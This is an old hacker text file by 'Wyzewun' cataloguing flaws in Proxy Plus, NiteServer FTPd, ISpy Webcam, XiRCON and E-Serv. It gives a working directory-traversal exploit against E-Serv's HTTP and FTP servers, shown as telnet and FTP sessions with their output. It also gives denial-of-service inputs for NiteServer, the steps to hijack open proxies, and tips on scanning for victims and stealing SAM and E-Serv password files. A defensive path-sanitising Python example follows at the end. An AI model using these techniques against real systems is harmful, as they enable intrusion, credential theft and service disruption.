.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.

"Bugs that I am embarrassed to admit I found" by Wyzewun

.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.

Yeap, found some dumb stuff that no-one in their right mind would care about, that I would be embarrassed putting on BugTraq, and that I seriously just don't *want* for myself, so I figured I'd just chuck them here for lack of anywhere better to put them. :)

----[ Table of Contents

[-*-] Proxy Plus
[-*-] NiteServer
[-*-] ISpy Webcam
[-*-] XiRCON
[-*-] E-Serv
[-*-] Generic Windoze Vulnerability

----[ Proxy Plus

The Proxy+ 2.30 proxy server available from www.proxyplus.cz appears to have some insecure default settings. By default, remote administration of the proxy server is possible for anyone who cares to point their browser to http://hostname:4400/admin

We must also consider that 99% of the people who are smart enough to know how to set up an access list for Proxy+ will also be dumb enough to set it up for localhost-only security - forgetting the open web proxy on port 4480 - meaning that anybody can *still* access the Administrator menu if they have a brain. This is a concept originally explored in rfp's article in Phrack 54. Werd to him. :)

Also, do not forget the Telnet gateway, which is also open by default and is an alternative to a Wingate for purposes of anonymous bouncing. (Although, unlike Wingate, Proxy+ *does* log by default and is thus not so incredibly anonymous. :P And then again, people can remotely turn logging OFF by default, so wtf.) Regardless, the welcome banner looks like this, should you wish to scan for it - you've probably seen one before...

    <blank line>
    TelNet Gateway Ready
    Enter destination (host_name:port):

Overall, hacking yourself a Proxy Plus proxy is much better than a Wingate because you can keep it all to yourself, administer it remotely etc. etc. - it's just damn nice in general.
:) Oh, and Proxy+ servers are most common in Czechoslovakia (.cz) if you wanna try and scan for them.

----[ NiteServer FTPd

This server is coded in VB and so, as you can imagine, is vulnerable to thousands of DoS attacks.

The first occurs when the daemon is fed over 40 or so "USER whatever" strings. The FTPd runs out of memory and commits suicide.

The second occurs when a password (PASS) is not terminated, and the daemon just keeps on getting fed more and more characters, allocating memory for all of them. While the daemon is being attacked, it will not respond to any users who are connecting to it, and the actual program will refuse to communicate with anyone physically at the host. Windows will become more slow and unusable than it already is, and the system may or may not fall over completely eventually.

The third: login, then type "PORT fuck,me,but,is,this,ftpd,lame,or,what" and then disconnect immediately. The FTP daemon will stop accepting connections.

The fourth: give a long argument to RNTO. Once again, it decides to stop accepting connections.

Is this daemon a fucking pussy or what? I could go on to list more, but it would just be cruel. Shjeesh, what's even sadder is that the author is trying to sell the source code to this thing: as if someone would actually want it - HEH!@#$%

----[ ISpy Webcam

The very popular ISpy Webcam by Creative stores the password for the FTP site it uploads to in the registry under \\HKEY_CURRENT_USER\Software\ISpy\ISPY\FTP in the "Password" value with a very laughable "encryption" scheme. Just a substitution cipher. I would include the key, but really, it's not worth the space. Just keep this in mind and figure the rest out yerself. :)

----[ XiRCON

The XiRCON IRC client disconnects from the IRC server it's connected to when receiving overly long CTCP messages. What an elite client.

----[ E-Serv

E-Serv (available from www.eserv.ru) is an SMTP, POP3, NNTP, FTP, HTTP, Proxy, and Finger server.
When testing out the HTTP server on my box, which is accessible by default on port 3128 and will most probably be moved to 80 on servers where it's being used as a webserver (it is also the Proxy's remote administration thingy), I found it to have a serious security flaw. All versions prior to 2.8 are vulnerable. We downloaded the "latest" version from Tucows (2.5) and assumed the bug had not been fixed, but when we mailed the authors of the software, it turned out they had found the bug themselves and fixed it in 2.8! Guess Tucows aren't into updating their archive, eh? Regardless, old versions are still common and I don't think the vulnerability has been covered publicly, so let's get to the sploit...

    [drew@kung-fusion]$ telnet ghay.windoze.box 3128
    Trying 192.168.66.7...
    Connected to ghay.windoze.box.
    Escape character is '^]'.
    GET /../../../../../../../../../../../../../../autoexec.bat HTTP/1.1

    HTTP/1.1 200 OK
    Content-Length: 297

    @echo off
    SET BLASTER=A220 I5 D1 T4
    PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\JDK\BIN
    CHOICE /C:YN /T:N,05 "Load SoftICE Debugger?"
    If Errorlevel=2 Goto End
    If Errorlevel=1 goto Softice
    :SoftIce
    echo Softice Loading
    C:\wyze1\exec\SOFTICE\WINICE.EXE
    goto end
    :End
    echo Starting Windows

Simple directory climbing, Ala-Ali-Baba. :)

It then occurred to me - "Hey, these people probably use the same routine for *all* file access". Over to the doze box...

    C:\wyze1>ftp localhost
    Connected to wizdumb.
    220 Eserv/2.5 FTP ready
    User (wizdumb:(none)): anonymous
    331 Password required
    Password:
    230 Login OK
    ftp> ls /../../../../../../../../../../../
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> ls ../../../../../../../../../../../
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> ls
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> get ../../../../../../../../../autoexec.bat
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp: 421 bytes received in 0.05Seconds 8.42Kbytes/sec.
    ftp> quit
    221 Goodbye.

Hmm, well I was right to an extent. You can't list files, but you *can* retrieve any file you want provided you know the name, which is good enough if we just go and retrieve the password files. :) And after all, I *might* be able to list files, if the damn directory listing *worked*. *Sigh* :P

Anyway, we should get sam._ on NT boxes, but on 9x boxes you'll probably have to grab the E-Serv password file, which can be found in /../../../conf/EServ.ini and uses fairly trivial encryption. Also note that the FTP server will be on port 3121 by default, and may be moved to port 21 on some boxes.

Now for a few interesting things that will probably apply to current versions as well: the anonymous FTP account in E-Serv applies for POP3 as well, so an E-Serv server can be a nice anonymous mail pickup for anyone who cares to connect to the POP3 daemon and login anonymously. The daemon also does stuff like making the modem dial/hangup CGI feature (http://host:3128/dial) accessible to anyone with a user-level login, including anonymous; although it can be configured to be Admin only, it is like this by default. Ditto for the webmail interface accepting anonymous logins.

And finally - a hint: looking for folks that run E-Serv? Scan good ol' Mother Russia, heh.

----[ Generic Windoze vulnerability

So many Windoze FTP/HTTP daemons allow you to play with files with device special filenames like COM1. This can result in allowing you to disconnect their modems, or in a worst-case scenario, taking full control of their modems and/or printers.

----[ That's it for now

My dog ate this frog, and it lay down in our lounge for a week before it died. You shouldn't let your dog eat frogs, man.
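The E-Serv traversal and the COM1 device-name problem in the last section share one root cause: the shared file-access routine trusts whatever name the client sends. As an added example (not E-Serv's or any other product's code), here is that routine in its naive form beside a hardened one; the document root and the requests are constructed, and the reserved-name list and the prefix check are the assumed policy.

```python
import ntpath
import re

# Windows reserved device names. Opening "COM1" or even "COM1.txt" hands the
# caller the device rather than a file: the "Generic Windoze" problem above.
_RESERVED = re.compile(r"^(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])(\.|$)", re.IGNORECASE)


def naive_resolve(root, requested):
    """The flawed routine: glue the request onto the root and hope. A request
    like '/../../../../autoexec.bat' walks straight out of the root."""
    return ntpath.normpath(ntpath.join(root, requested.replace("/", "\\")))


def safe_resolve(root, requested):
    """Hardened routine: return the absolute target, or None when the request
    climbs out of the root or names a device."""
    segments = [s for s in requested.replace("\\", "/").split("/") if s and s != "."]
    for seg in segments:
        if seg == ".." or _RESERVED.match(seg):
            return None  # traversal attempt or device special filename
    target = ntpath.normpath(ntpath.join(root, *segments))
    # Second guard: a segment such as "D:" makes ntpath.join switch drive, so
    # confirm the normalised result still sits under the root.
    root_prefix = ntpath.normpath(root).rstrip("\\").lower() + "\\"
    if (target.lower() + "\\").startswith(root_prefix):
        return target
    return None


if __name__ == "__main__":
    root = "C:\\www\\docs"  # constructed document root
    for req in ("index.htm", "/../../../../autoexec.bat", "COM1", "logs/com1.txt", "D:/x"):
        print(f"{req!r:30} naive={naive_resolve(root, req)!r:30} safe={safe_resolve(root, req)!r}")
```

The same check belongs in front of every file-touching verb (GET, RETR, LIST, RNTO, STOR), since the page shows the HTTP and FTP front ends sharing one routine.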